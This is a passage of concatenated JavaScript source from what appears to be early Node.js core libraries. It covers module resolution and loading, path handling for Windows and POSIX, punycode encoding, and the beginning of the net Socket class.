  var splitRe = process.platform === 'win32' ? /[\/\\]/ : /\//;
  var paths = [];
  var parts = from.split(splitRe);

  for (var tip = parts.length - 1; tip >= 0; tip--) {
    
    if (parts[tip] === 'node_modules') continue;
    var dir = parts.slice(0, tip + 1).concat('node_modules').join(path.sep);
    paths.push(dir);
  }

  return paths;
};


Module._resolveLookupPaths = function(request, parent) {
  if (NativeModule.exists(request)) {
    return [request, []];
  }

  var start = request.substring(0, 2);
  if (start !== './' && start !== '..') {
    var paths = modulePaths;
    if (parent) {
      if (!parent.paths) parent.paths = [];
      paths = parent.paths.concat(paths);
    }
    return [request, paths];
  }

  
  if (!parent || !parent.id || !parent.filename) {
    
    
    var mainPaths = ['.'].concat(modulePaths);
    mainPaths = Module._nodeModulePaths('.').concat(mainPaths);
    return [request, mainPaths];
  }

  
  
  
  var isIndex = /^index\.\w+?$/.test(path.basename(parent.filename));
  var parentIdPath = isIndex ? parent.id : path.dirname(parent.id);
  var id = path.resolve(parentIdPath, request);

  
  
  if (parentIdPath === '.' && id.indexOf('/') === -1) {
    id = './' + id;
  }

  return [id, [path.dirname(parent.filename)]];
};









Module._load = function(request, parent, isMain) {

  var filename = Module._resolveFilename(request, parent);

  var cachedModule = Module._cache[filename];
  if (cachedModule) {
    return cachedModule.exports;
  }

  if (NativeModule.exists(filename)) {
    
    if (filename == 'repl') {
      var replModule = new Module('repl');
      replModule._compile(NativeModule.getSource('repl'), 'repl.js');
      NativeModule._cache.repl = replModule;
      return replModule.exports;
    }

    return NativeModule.require(filename);
  }

  var module = new Module(filename, parent);

  if (isMain) {
    process.mainModule = module;
    module.id = '.';
  }

  Module._cache[filename] = module;

  var hadException = true;

  try {
    module.load(filename);
    hadException = false;
  } finally {
    if (hadException) {
      delete Module._cache[filename];
    }
  }

  return module.exports;
};

Module._resolveFilename = function(request, parent) {
  if (NativeModule.exists(request)) {
    return request;
  }

  var resolvedModule = Module._resolveLookupPaths(request, parent);
  var id = resolvedModule[0];
  var paths = resolvedModule[1];

  

  var filename = Module._findPath(request, paths);
  if (!filename) {
    var err = new Error("Cannot find module '" + request + "'");
    err.code = 'MODULE_NOT_FOUND';
    throw err;
  }
  return filename;
};



Module.prototype.load = function(filename) {
  assert(!this.loaded);
  this.filename = filename;
  this.paths = Module._nodeModulePaths(path.dirname(filename));

  var extension = path.extname(filename) || '.js';
  if (!Module._extensions[extension]) extension = '.js';
  Module._extensions[extension](this, filename);
  this.loaded = true;
};




Module.prototype.require = function(path) {
  assert(util.isString(path), 'path must be a string');
  assert(path, 'missing path');
  return Module._load(path, this);
};




var resolvedArgv;






Module.prototype._compile = function(content, filename) {
  var self = this;
  
  content = content.replace(/^\#\!.*/, '');

  function require(path) {
    return self.require(path);
  }

  require.resolve = function(request) {
    return Module._resolveFilename(request, self);
  };

  Object.defineProperty(require, 'paths', { get: function() {
    throw new Error('require.paths is removed. Use ' +
                    'node_modules folders, or the NODE_PATH ' +
                    'environment variable instead.');
  }});

  require.main = process.mainModule;

  
  require.extensions = Module._extensions;
  require.registerExtension = function() {
    throw new Error('require.registerExtension() removed. Use ' +
                    'require.extensions instead.');
  };

  require.cache = Module._cache;

  var dirname = path.dirname(filename);

  if (Module._contextLoad) {
    if (self.id !== '.') {

      
      var sandbox = {};
      for (var k in global) {
        sandbox[k] = global[k];
      }
      sandbox.require = require;
      sandbox.exports = self.exports;
      sandbox.__filename = filename;
      sandbox.__dirname = dirname;
      sandbox.module = self;
      sandbox.global = sandbox;
      sandbox.root = root;

      return runInNewContext(content, sandbox, { filename: filename });
    }


    
    global.require = require;
    global.exports = self.exports;
    global.__filename = filename;
    global.__dirname = dirname;
    global.module = self;

    return runInThisContext(content, { filename: filename });
  }

  
  var wrapper = Module.wrap(content);

  var compiledWrapper = runInThisContext(wrapper, { filename: filename });
  if (global.v8debug) {
    if (!resolvedArgv) {
      
      if (process.argv[1]) {
        resolvedArgv = Module._resolveFilename(process.argv[1], null);
      } else {
        resolvedArgv = 'repl';
      }
    }

    
    if (filename === resolvedArgv) {
      global.v8debug.Debug.setBreakPoint(compiledWrapper, 0, 0);
    }
  }
  var args = [self.exports, require, self, filename, dirname];
  return compiledWrapper.apply(self.exports, args);
};


function stripBOM(content) {
  
  
  
  if (content.charCodeAt(0) === 0xFEFF) {
    content = content.slice(1);
  }
  return content;
}



Module._extensions['.js'] = function(module, filename) {
  var content = fs.readFileSync(filename, 'utf8');
  module._compile(stripBOM(content), filename);
};



Module._extensions['.json'] = function(module, filename) {
  var content = fs.readFileSync(filename, 'utf8');
  try {
    module.exports = JSON.parse(stripBOM(content));
  } catch (err) {
    err.message = filename + ': ' + err.message;
    throw err;
  }
};



Module._extensions['.node'] = process.dlopen;



Module.runMain = function() {
  
  Module._load(process.argv[1], null, true);
  
  process._tickCallback();
};

Module._initPaths = function() {
  var isWindows = process.platform === 'win32';

  if (isWindows) {
    var homeDir = process.env.USERPROFILE;
  } else {
    var homeDir = process.env.HOME;
  }

  var paths = [path.resolve(process.execPath, '..', '..', 'lib', 'node')];

  if (homeDir) {
    paths.unshift(path.resolve(homeDir, '.node_libraries'));
    paths.unshift(path.resolve(homeDir, '.node_modules'));
  }

  var nodePath = process.env['NODE_PATH'];
  if (nodePath) {
    paths = nodePath.split(path.delimiter).concat(paths);
  }

  modulePaths = paths;

  
  Module.globalPaths = modulePaths.slice(0);
};


Module.requireRepl = function() {
  return Module._load('repl', '.');
};

Module._initPaths();


Module.Module = Module;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     

========























var isWindows = process.platform === 'win32';
var util = require('util');






function normalizeArray(parts, allowAboveRoot) {
  
  var up = 0;
  for (var i = parts.length - 1; i >= 0; i--) {
    var last = parts[i];
    if (last === '.') {
      parts.splice(i, 1);
    } else if (last === '..') {
      parts.splice(i, 1);
      up++;
    } else if (up) {
      parts.splice(i, 1);
      up--;
    }
  }

  
  if (allowAboveRoot) {
    for (; up--; up) {
      parts.unshift('..');
    }
  }

  return parts;
}


if (isWindows) {
  
  
  var splitDeviceRe =
      /^([a-zA-Z]:|[\\\/]{2}[^\\\/]+[\\\/]+[^\\\/]+)?([\\\/])?([\s\S]*?)$/;

  
  var splitTailRe =
      /^([\s\S]*?)((?:\.{1,2}|[^\\\/]+?|)(\.[^.\/\\]*|))(?:[\\\/]*)$/;

  
  
  var splitPath = function(filename) {
    
    var result = splitDeviceRe.exec(filename),
        device = (result[1] || '') + (result[2] || ''),
        tail = result[3] || '';
    
    var result2 = splitTailRe.exec(tail),
        dir = result2[1],
        basename = result2[2],
        ext = result2[3];
    return [device, dir, basename, ext];
  };

  var normalizeUNCRoot = function(device) {
    return '\\\\' + device.replace(/^[\\\/]+/, '').replace(/[\\\/]+/g, '\\');
  };

  
  
  exports.resolve = function() {
    var resolvedDevice = '',
        resolvedTail = '',
        resolvedAbsolute = false;

    for (var i = arguments.length - 1; i >= -1; i--) {
      var path;
      if (i >= 0) {
        path = arguments[i];
      } else if (!resolvedDevice) {
        path = process.cwd();
      } else {
        
        
        
        
        path = process.env['=' + resolvedDevice];
        
        
        if (!path || path.substr(0, 3).toLowerCase() !==
            resolvedDevice.toLowerCase() + '\\') {
          path = resolvedDevice + '\\';
        }
      }

      
      if (!util.isString(path)) {
        throw new TypeError('Arguments to path.resolve must be strings');
      } else if (!path) {
        continue;
      }

      var result = splitDeviceRe.exec(path),
          device = result[1] || '',
          isUnc = device && device.charAt(1) !== ':',
          isAbsolute = exports.isAbsolute(path),
          tail = result[3];

      if (device &&
          resolvedDevice &&
          device.toLowerCase() !== resolvedDevice.toLowerCase()) {
        
        continue;
      }

      if (!resolvedDevice) {
        resolvedDevice = device;
      }
      if (!resolvedAbsolute) {
        resolvedTail = tail + '\\' + resolvedTail;
        resolvedAbsolute = isAbsolute;
      }

      if (resolvedDevice && resolvedAbsolute) {
        break;
      }
    }

    
    
    if (isUnc) {
      resolvedDevice = normalizeUNCRoot(resolvedDevice);
    }

    
    
    

    

    function f(p) {
      return !!p;
    }

    resolvedTail = normalizeArray(resolvedTail.split(/[\\\/]+/).filter(f),
                                  !resolvedAbsolute).join('\\');

    return (resolvedDevice + (resolvedAbsolute ? '\\' : '') + resolvedTail) ||
           '.';
  };

  
  exports.normalize = function(path) {
    var result = splitDeviceRe.exec(path),
        device = result[1] || '',
        isUnc = device && device.charAt(1) !== ':',
        isAbsolute = exports.isAbsolute(path),
        tail = result[3],
        trailingSlash = /[\\\/]$/.test(tail);

    
    if (device && device.charAt(1) === ':') {
      device = device[0].toLowerCase() + device.substr(1);
    }

    
    tail = normalizeArray(tail.split(/[\\\/]+/).filter(function(p) {
      return !!p;
    }), !isAbsolute).join('\\');

    if (!tail && !isAbsolute) {
      tail = '.';
    }
    if (tail && trailingSlash) {
      tail += '\\';
    }

    
    
    if (isUnc) {
      device = normalizeUNCRoot(device);
    }

    return device + (isAbsolute ? '\\' : '') + tail;
  };

  
  exports.isAbsolute = function(path) {
    var result = splitDeviceRe.exec(path),
        device = result[1] || '',
        isUnc = !!device && device.charAt(1) !== ':';
    
    return !!result[2] || isUnc;
  };

  
  exports.join = function() {
    function f(p) {
      if (!util.isString(p)) {
        throw new TypeError('Arguments to path.join must be strings');
      }
      return p;
    }

    var paths = Array.prototype.filter.call(arguments, f);
    var joined = paths.join('\\');

    
    
    
    
    
    
    
    
    
    
    
    
    
    if (!/^[\\\/]{2}[^\\\/]/.test(paths[0])) {
      joined = joined.replace(/^[\\\/]{2,}/, '\\');
    }

    return exports.normalize(joined);
  };

  
  
  
  
  
  
  exports.relative = function(from, to) {
    from = exports.resolve(from);
    to = exports.resolve(to);

    
    var lowerFrom = from.toLowerCase();
    var lowerTo = to.toLowerCase();

    function trim(arr) {
      var start = 0;
      for (; start < arr.length; start++) {
        if (arr[start] !== '') break;
      }

      var end = arr.length - 1;
      for (; end >= 0; end--) {
        if (arr[end] !== '') break;
      }

      if (start > end) return [];
      return arr.slice(start, end + 1);
    }

    var toParts = trim(to.split('\\'));

    var lowerFromParts = trim(lowerFrom.split('\\'));
    var lowerToParts = trim(lowerTo.split('\\'));

    var length = Math.min(lowerFromParts.length, lowerToParts.length);
    var samePartsLength = length;
    for (var i = 0; i < length; i++) {
      if (lowerFromParts[i] !== lowerToParts[i]) {
        samePartsLength = i;
        break;
      }
    }

    if (samePartsLength == 0) {
      return to;
    }

    var outputParts = [];
    for (var i = samePartsLength; i < lowerFromParts.length; i++) {
      outputParts.push('..');
    }

    outputParts = outputParts.concat(toParts.slice(samePartsLength));

    return outputParts.join('\\');
  };

  exports.sep = '\\';
  exports.delimiter = ';';

} else  {

  
  
  var splitPathRe =
      /^(\/?|)([\s\S]*?)((?:\.{1,2}|[^\/]+?|)(\.[^.\/]*|))(?:[\/]*)$/;
  var splitPath = function(filename) {
    return splitPathRe.exec(filename).slice(1);
  };

  
  
  exports.resolve = function() {
    var resolvedPath = '',
        resolvedAbsolute = false;

    for (var i = arguments.length - 1; i >= -1 && !resolvedAbsolute; i--) {
      var path = (i >= 0) ? arguments[i] : process.cwd();

      
      if (!util.isString(path)) {
        throw new TypeError('Arguments to path.resolve must be strings');
      } else if (!path) {
        continue;
      }

      resolvedPath = path + '/' + resolvedPath;
      resolvedAbsolute = path.charAt(0) === '/';
    }

    
    

    
    resolvedPath = normalizeArray(resolvedPath.split('/').filter(function(p) {
      return !!p;
    }), !resolvedAbsolute).join('/');

    return ((resolvedAbsolute ? '/' : '') + resolvedPath) || '.';
  };

  
  
  exports.normalize = function(path) {
    var isAbsolute = exports.isAbsolute(path),
        trailingSlash = path[path.length - 1] === '/',
        segments = path.split('/'),
        nonEmptySegments = [];

    
    for (var i = 0; i < segments.length; i++) {
      if (segments[i]) {
        nonEmptySegments.push(segments[i]);
      }
    }
    path = normalizeArray(nonEmptySegments, !isAbsolute).join('/');

    if (!path && !isAbsolute) {
      path = '.';
    }
    if (path && trailingSlash) {
      path += '/';
    }

    return (isAbsolute ? '/' : '') + path;
  };

  
  exports.isAbsolute = function(path) {
    return path.charAt(0) === '/';
  };

  
  exports.join = function() {
    var path = '';
    for (var i = 0; i < arguments.length; i++) {
      var segment = arguments[i];
      if (!util.isString(segment)) {
        throw new TypeError('Arguments to path.join must be strings');
      }
      if (segment) {
        if (!path) {
          path += segment;
        } else {
          path += '/' + segment;
        }
      }
    }
    return exports.normalize(path);
  };


  
  
  exports.relative = function(from, to) {
    from = exports.resolve(from).substr(1);
    to = exports.resolve(to).substr(1);

    function trim(arr) {
      var start = 0;
      for (; start < arr.length; start++) {
        if (arr[start] !== '') break;
      }

      var end = arr.length - 1;
      for (; end >= 0; end--) {
        if (arr[end] !== '') break;
      }

      if (start > end) return [];
      return arr.slice(start, end + 1);
    }

    var fromParts = trim(from.split('/'));
    var toParts = trim(to.split('/'));

    var length = Math.min(fromParts.length, toParts.length);
    var samePartsLength = length;
    for (var i = 0; i < length; i++) {
      if (fromParts[i] !== toParts[i]) {
        samePartsLength = i;
        break;
      }
    }

    var outputParts = [];
    for (var i = samePartsLength; i < fromParts.length; i++) {
      outputParts.push('..');
    }

    outputParts = outputParts.concat(toParts.slice(samePartsLength));

    return outputParts.join('/');
  };

  exports.sep = '/';
  exports.delimiter = ':';
}

exports.dirname = function(path) {
  var result = splitPath(path),
      root = result[0],
      dir = result[1];

  if (!root && !dir) {
    
    return '.';
  }

  if (dir) {
    
    dir = dir.substr(0, dir.length - 1);
  }

  return root + dir;
};


exports.basename = function(path, ext) {
  var f = splitPath(path)[2];
  
  if (ext && f.substr(-1 * ext.length) === ext) {
    f = f.substr(0, f.length - ext.length);
  }
  return f;
};


exports.extname = function(path) {
  return splitPath(path)[3];
};


exports.exists = util.deprecate(function(path, callback) {
  require('fs').exists(path, callback);
}, 'path.exists is now called `fs.exists`.');


exports.existsSync = util.deprecate(function(path) {
  return require('fs').existsSync(path);
}, 'path.existsSync is now called `fs.existsSync`.');


if (isWindows) {
  exports._makeLong = function(path) {
    
    if (!util.isString(path))
      return path;

    if (!path) {
      return '';
    }

    var resolvedPath = exports.resolve(path);

    if (/^[a-zA-Z]\:\\/.test(resolvedPath)) {
      
      
      return '\\\\?\\' + resolvedPath;
    } else if (/^\\\\[^?.]/.test(resolvedPath)) {
      
      
      return '\\\\?\\UNC\\' + resolvedPath.substring(2);
    }

    return path;
  };
} else {
  exports._makeLong = function(path) {
    return path;
  };
}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    

========


;(function(root) {

	
	var freeExports = typeof exports == 'object' && exports;
	var freeModule = typeof module == 'object' && module &&
		module.exports == freeExports && module;
	var freeGlobal = typeof global == 'object' && global;
	if (freeGlobal.global === freeGlobal || freeGlobal.window === freeGlobal) {
		root = freeGlobal;
	}

	
	var punycode,

	
	maxInt = 2147483647, 

	
	base = 36,
	tMin = 1,
	tMax = 26,
	skew = 38,
	damp = 700,
	initialBias = 72,
	initialN = 128, 
	delimiter = '-', 

	
	regexPunycode = /^xn--/,
	regexNonASCII = /[^ -~]/, 
	regexSeparators = /\x2E|\u3002|\uFF0E|\uFF61/g, 

	
	errors = {
		'overflow': 'Overflow: input needs wider integers to process',
		'not-basic': 'Illegal input >= 0x80 (not a basic code point)',
		'invalid-input': 'Invalid input'
	},

	
	baseMinusTMin = base - tMin,
	floor = Math.floor,
	stringFromCharCode = String.fromCharCode,

	
	key;

	

	
	function error(type) {
		throw RangeError(errors[type]);
	}

	
	function map(array, fn) {
		var length = array.length;
		while (length--) {
			array[length] = fn(array[length]);
		}
		return array;
	}

	
	function mapDomain(string, fn) {
		return map(string.split(regexSeparators), fn).join('.');
	}

	
	function ucs2decode(string) {
		var output = [],
		    counter = 0,
		    length = string.length,
		    value,
		    extra;
		while (counter < length) {
			value = string.charCodeAt(counter++);
			if (value >= 0xD800 && value <= 0xDBFF && counter < length) {
				
				extra = string.charCodeAt(counter++);
				if ((extra & 0xFC00) == 0xDC00) { 
					output.push(((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000);
				} else {
					
					
					output.push(value);
					counter--;
				}
			} else {
				output.push(value);
			}
		}
		return output;
	}

	
	function ucs2encode(array) {
		return map(array, function(value) {
			var output = '';
			if (value > 0xFFFF) {
				value -= 0x10000;
				output += stringFromCharCode(value >>> 10 & 0x3FF | 0xD800);
				value = 0xDC00 | value & 0x3FF;
			}
			output += stringFromCharCode(value);
			return output;
		}).join('');
	}

	
	function basicToDigit(codePoint) {
		if (codePoint - 48 < 10) {
			return codePoint - 22;
		}
		if (codePoint - 65 < 26) {
			return codePoint - 65;
		}
		if (codePoint - 97 < 26) {
			return codePoint - 97;
		}
		return base;
	}

	
	function digitToBasic(digit, flag) {
		
		
		return digit + 22 + 75 * (digit < 26) - ((flag != 0) << 5);
	}

	
	function adapt(delta, numPoints, firstTime) {
		var k = 0;
		delta = firstTime ? floor(delta / damp) : delta >> 1;
		delta += floor(delta / numPoints);
		for (; delta > baseMinusTMin * tMax >> 1; k += base) {
			delta = floor(delta / baseMinusTMin);
		}
		return floor(k + (baseMinusTMin + 1) * delta / (delta + skew));
	}

	
	function decode(input) {
		
		var output = [],
		    inputLength = input.length,
		    out,
		    i = 0,
		    n = initialN,
		    bias = initialBias,
		    basic,
		    j,
		    index,
		    oldi,
		    w,
		    k,
		    digit,
		    t,
		    
		    baseMinusT;

		
		
		

		basic = input.lastIndexOf(delimiter);
		if (basic < 0) {
			basic = 0;
		}

		for (j = 0; j < basic; ++j) {
			
			if (input.charCodeAt(j) >= 0x80) {
				error('not-basic');
			}
			output.push(input.charCodeAt(j));
		}

		
		

		for (index = basic > 0 ? basic + 1 : 0; index < inputLength; ) {

			
			
			
			
			
			for (oldi = i, w = 1, k = base; ; k += base) {

				if (index >= inputLength) {
					error('invalid-input');
				}

				digit = basicToDigit(input.charCodeAt(index++));

				if (digit >= base || digit > floor((maxInt - i) / w)) {
					error('overflow');
				}

				i += digit * w;
				t = k <= bias ? tMin : (k >= bias + tMax ? tMax : k - bias);

				if (digit < t) {
					break;
				}

				baseMinusT = base - t;
				if (w > floor(maxInt / baseMinusT)) {
					error('overflow');
				}

				w *= baseMinusT;

			}

			out = output.length + 1;
			bias = adapt(i - oldi, out, oldi == 0);

			
			
			if (floor(i / out) > maxInt - n) {
				error('overflow');
			}

			n += floor(i / out);
			i %= out;

			
			output.splice(i++, 0, n);

		}

		return ucs2encode(output);
	}

	
	function encode(input) {
		var n,
		    delta,
		    handledCPCount,
		    basicLength,
		    bias,
		    j,
		    m,
		    q,
		    k,
		    t,
		    currentValue,
		    output = [],
		    
		    inputLength,
		    
		    handledCPCountPlusOne,
		    baseMinusT,
		    qMinusT;

		
		input = ucs2decode(input);

		
		inputLength = input.length;

		
		n = initialN;
		delta = 0;
		bias = initialBias;

		
		for (j = 0; j < inputLength; ++j) {
			currentValue = input[j];
			if (currentValue < 0x80) {
				output.push(stringFromCharCode(currentValue));
			}
		}

		handledCPCount = basicLength = output.length;

		
		

		
		if (basicLength) {
			output.push(delimiter);
		}

		
		while (handledCPCount < inputLength) {

			
			
			for (m = maxInt, j = 0; j < inputLength; ++j) {
				currentValue = input[j];
				if (currentValue >= n && currentValue < m) {
					m = currentValue;
				}
			}

			
			
			handledCPCountPlusOne = handledCPCount + 1;
			if (m - n > floor((maxInt - delta) / handledCPCountPlusOne)) {
				error('overflow');
			}

			delta += (m - n) * handledCPCountPlusOne;
			n = m;

			for (j = 0; j < inputLength; ++j) {
				currentValue = input[j];

				if (currentValue < n && ++delta > maxInt) {
					error('overflow');
				}

				if (currentValue == n) {
					// Represent delta as a generalized variable-length integer
					for (q = delta, k = base; /* no condition */; k += base) {
						t = k <= bias ? tMin : (k >= bias + tMax ? tMax : k - bias);
						if (q < t) {
							break;
						}
						qMinusT = q - t;
						baseMinusT = base - t;
						output.push(
							stringFromCharCode(digitToBasic(t + qMinusT % baseMinusT, 0))
						);
						q = floor(qMinusT / baseMinusT);
					}

					output.push(stringFromCharCode(digitToBasic(q, 0)));
					bias = adapt(delta, handledCPCountPlusOne, handledCPCount == basicLength);
					delta = 0;
					++handledCPCount;
				}
			}

			++delta;
			++n;

		}
		return output.join('');
	}

	
	function toUnicode(domain) {
		return mapDomain(domain, function(string) {
			return regexPunycode.test(string)
				? decode(string.slice(4).toLowerCase())
				: string;
		});
	}

	
	function toASCII(domain) {
		return mapDomain(domain, function(string) {
			return regexNonASCII.test(string)
				? 'xn--' + encode(string)
				: string;
		});
	}

	

	
	punycode = {
		
		'version': '1.2.3',
		
		'ucs2': {
			'decode': ucs2decode,
			'encode': ucs2encode
		},
		'decode': decode,
		'encode': encode,
		'toASCII': toASCII,
		'toUnicode': toUnicode
	};

	
	
	
	if (
		typeof define == 'function' &&
		typeof define.amd == 'object' &&
		define.amd
	) {
		define(function() {
			return punycode;
		});
	}	else if (freeExports && !freeExports.nodeType) {
		if (freeModule) { 
			freeModule.exports = punycode;
		} else { 
			for (key in punycode) {
				punycode.hasOwnProperty(key) && (freeExports[key] = punycode[key]);
			}
		}
	} else { 
		root.punycode = punycode;
	}

}(this));
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

========






















var events = require('events');
var stream = require('stream');
var timers = require('timers');
var util = require('util');
var assert = require('assert');
var cares = process.binding('cares_wrap');
var uv = process.binding('uv');
var Pipe = process.binding('pipe_wrap').Pipe;


var cluster;
var errnoException = util._errnoException;

function noop() {}


function createPipe() {
  return new Pipe();
}


function createTCP() {
  var TCP = process.binding('tcp_wrap').TCP;
  return new TCP();
}


function createHandle(fd) {
  var tty = process.binding('tty_wrap');
  var type = tty.guessHandleType(fd);
  if (type === 'PIPE') return createPipe();
  if (type === 'TCP') return createTCP();
  throw new TypeError('Unsupported fd type: ' + type);
}




function isPipeName(s) {
  return util.isString(s) && toNumber(s) === false;
}


exports.createServer = function() {
  return new Server(arguments[0], arguments[1]);
};














exports.connect = exports.createConnection = function() {
  var args = normalizeConnectArgs(arguments);
  
  var s = new Socket(args[0]);
  return Socket.prototype.connect.apply(s, args);
};



function normalizeConnectArgs(args) {
  var options = {};

  if (util.isObject(args[0])) {
    
    options = args[0];
  } else if (isPipeName(args[0])) {
    
    options.path = args[0];
  } else {
    
    options.port = args[0];
    if (util.isString(args[1])) {
      options.host = args[1];
    }
  }

  var cb = args[args.length - 1];
  return util.isFunction(cb) ? [options, cb] : [options];
}
exports._normalizeConnectArgs = normalizeConnectArgs;



function initSocketHandle(self) {
  self.destroyed = false;
  self.bytesRead = 0;
  self._bytesDispatched = 0;

  
  if (self._handle) {
    self._handle.owner = self;
    self._handle.onread = onread;

    
    if (!self._handle.writev)
      self._writev = null;
  }
}

function Socket(options) {
  if (!(this instanceof Socket)) return new Socket(options);

  this._connecting = false;
  this._hadError = false;
  this._handle = null;
  this._host = null;

  if (util.isNumber(options))
    options = { fd: options }; 
  else if (util.isUndefined(options))
    options = {};

  stream.Duplex.call(this, options);

  if (options.handle) {
    this._handle = options.handle; 
  } else if (!util.isUndefined(options.fd)) {
    this._handle = createHandle(options.fd);
    this._handle.open(options.fd);
    if ((options.fd == 1 || options.fd == 2) &&
        (this._handle instanceof Pipe) &&
        process.platform === 'win32') {
      
      var err = this._handle.setBlocking(true);
      if (err)
        throw errnoException(err, 'setBlocking');
    }
    this.readable = options.readable !== false;
    this.writable = options.writable !== false;
  } else {
    
    this.readable = this.writable = false;
  }

  
  this.on('finish', onSocketFinish);
  this.on('_socketEnd', onSocketEnd);

  initSocketHandle(this);

  this._pendingData = null;
  this._pendingEncoding = '';

  
  this._writableState.decodeStrings = false;

  
  this.allowHalfOpen = options && options.allowHalfOpen || false;

  
  
  if (this._handle && options.readable !== false)
    this.read(0);
}
util.inherits(Socket, stream.Duplex);







function onSocketFinish() {
  
  if (this._connecting) {
    
    return this.once('connect', onSocketFinish);
  }

  
  if (!this.readable || this._readableState.ended) {
    
    return this.destroy();
  }

  

  
  if (!this._handle || !this._handle.shutdown)
    return this.destroy();

  var req = { oncomplete: afterShutdown };
  var err = this._handle.shutdown(req);

  if (err)
    return this._destroy(errnoException(err, 'shutdown'));
}


function afterShutdown(status, handle, req) {
  var self = handle.owner;

  
  

  
  if (self.destroyed)
    return;

  if (self._readableState.ended) {
    
    self.destroy();
  } else {
    self.once('_socketEnd', self.destroy);
  }
}




function onSocketEnd() {
  
  
  
  
  this._readableState.ended = true;
  if (this._readableState.endEmitted) {
    this.readable = false;
    maybeDestroy(this);
  } else {
    this.once('end', function() {
      this.readable = false;
      maybeDestroy(this);
    });
    this.read(0);
  }

  if (!this.allowHalfOpen) {
    this.write = writeAfterFIN;
    this.destroySoon();
  }
}




function writeAfterFIN(chunk, encoding, cb) {
  if (util.isFunction(encoding)) {
    cb = encoding;
    encoding = null;
  }

  var er = new Error('This socket has been ended by the other party');
  er.code = 'EPIPE';
  var self = this;
  
  self.emit('error', er);
  if (util.isFunction(cb)) {
    process.nextTick(function() {
      cb(er);
    });
  }
}

exports.Socket = Socket;
exports.Stream = Socket; 

Socket.prototype.read = function(n) {
  if (n === 0)
    return stream.Readable.prototype.read.call(this, n);

  this.read = stream.Readable.prototype.read;
  this._consuming = true;
  return this.read(n);
};


Socket.prototype.listen = function() {
  
  var self = this;
  self.on('connection', arguments[0]);
  listen(self, null, null, null);
};


Socket.prototype.setTimeout = function(msecs, callback) {
  if (msecs > 0 && isFinite(msecs)) {
    timers.enroll(this, msecs);
    timers._unrefActive(this);
    if (callback) {
      this.once('timeout', callback);
    }
  } else if (msecs === 0) {
    timers.unenroll(this);
    if (callback) {
      this.removeListener('timeout', callback);
    }
  }
};


Socket.prototype._onTimeout = function() {
  
  this.emit('timeout');
};


Socket.prototype.setNoDelay = function(enable) {
  
  if (this._handle && this._handle.setNoDelay)
    this._handle.setNoDelay(util.isUndefined(enable) ? true : !!enable);
};


Socket.prototype.setKeepAlive = function(setting, msecs) {
  if (this._handle && this._handle.setKeepAlive)
    this._handle.setKeepAlive(setting, ~~(msecs / 1000));
};


Socket.prototype.address = function() {
  return this._getsockname();
};


Object.defineProperty(Socket.prototype, 'readyState', {
  get: function() {
    if (this._connecting) {
      return 'opening';
    } else if (this.readable && this.writable) {
      return 'open';
    } else if (this.readable && !this.writable) {
      return 'readOnly';
    } else if (!this.readable && this.writable) {
      return 'writeOnly';
    } else {
      return 'closed';
    }
  }
});


Object.defineProperty(Socket.prototype, 'bufferSize', {
  get: function() {
    if (this._handle) {
      return this._handle.writeQueueSize + this._writableState.length;
    }
  }
});


// Just call handle.readStart until we have enough in the buffer
Socket.prototype._read = function(n) {
  //debug('_read');

  if (this._connecting || !this._handle) {
    //debug('_read wait for connection');
    this.once('connect', this._read.bind(this, n));
  } else if (!this._handle.reading) {
    // not already reading, start the flow
    //debug('Socket._read readStart');
    this._handle.reading = true;
    var err = this._handle.readStart();
    if (err)
      this._destroy(errnoException(err, 'read'));
  }
};


Socket.prototype.end = function(data, encoding) {
  stream.Duplex.prototype.end.call(this, data, encoding);
  this.writable = false;
  //DTRACE_NET_STREAM_END(this);

  // just in case we're waiting for an EOF.
  if (this.readable && !this._readableState.endEmitted)
    this.read(0);
  else
    maybeDestroy(this);
};


// Call whenever we set writable=false or readable=false
function maybeDestroy(socket) {
  if (!socket.readable &&
      !socket.writable &&
      !socket.destroyed &&
      !socket._connecting &&
      !socket._writableState.length) {
    socket.destroy();
  }
}


Socket.prototype.destroySoon = function() {
  if (this.writable)
    this.end();

  if (this._writableState.finished)
    this.destroy();
  else
    this.once('finish', this.destroy);
};


Socket.prototype._destroy = function(exception, cb) {
  //debug('destroy');

  var self = this;

  function fireErrorCallbacks() {
    if (cb) cb(exception);
    if (exception && !self._writableState.errorEmitted) {
      process.nextTick(function() {
        self.emit('error', exception);
      });
      self._writableState.errorEmitted = true;
    }
  };

  if (this.destroyed) {
    //debug('already destroyed, fire error callbacks');
    fireErrorCallbacks();
    return;
  }

  self._connecting = false;

  this.readable = this.writable = false;

  timers.unenroll(this);

  //debug('close');
  if (this._handle) {
